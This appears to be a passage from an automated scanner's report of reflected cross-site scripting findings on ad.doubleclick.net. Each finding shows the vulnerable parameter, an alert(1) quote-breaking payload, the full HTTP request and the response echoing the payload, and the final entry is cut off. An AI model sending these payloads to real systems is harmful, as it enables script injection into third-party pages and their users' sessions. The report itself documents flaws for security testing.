Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9edc"-alert(1)-"8bb572df34f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:16 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f1b6'-alert(1)-'199859732fe was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:20 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1003"-alert(1)-"71bfd521409 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:33 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e24'-alert(1)-'4a3043c545 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:37 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6995

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ac3/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51eaf'-alert(1)-'d7a41afa548 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:50:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:50:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f488a"-alert(1)-"6b12f66611a was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:49:59 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:49:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a0d'-alert(1)-'16687507dee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507dee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:46 GMT
Expires: Mon, 07 Mar 2011 01:50:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507deehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1e2"-alert(1)-"0bc0708a95e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:50:42 GMT
Expires: Mon, 07 Mar 2011 01:50:42 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95ehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f7f"-alert(1)-"5a9954e2121 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbe5e'-alert(1)-'0ce86ae9e85 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:48:07 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:48:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6999

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/syn.embarq/footer

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3277a'-alert(1)-'4ce2523eee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/syn.embarq/footer?3277a'-alert(1)-'4ce2523eee0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 299
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:49 GMT
Expires: Tue, 08 Mar 2011 11:59:49 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;26549892;4307-300/250;0/0/0;;~okv=;3277a'-alert(1)-'4ce2523eee0=1;~aopt=2/0/5c/0;~sscs=%3f"><im
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/test.gmaps/business [dc_ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/test.gmaps/business

Issue detail

The value of the dc_ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd04'%3balert(1)//df8038a084e was submitted in the dc_ref parameter. This input was echoed as cdd04';alert(1)//df8038a084e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/test.gmaps/business;dc_ref=cdd04'%3balert(1)//df8038a084e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://maps.google.com/mapfiles/ads/pp_dfp_ads_20100528.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 01:23:42 GMT
Expires: Tue, 08 Mar 2011 01:23:42 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;46537204;4307-300/250;0/0/0;;~okv=;dc_ref=cdd04';alert(1)//df8038a084e;bsg=3005;bsg=3017;;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/test.gmaps/business

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25dd4'-alert(1)-'524a5a4183f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/test.gmaps/business?25dd4'-alert(1)-'524a5a4183f=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
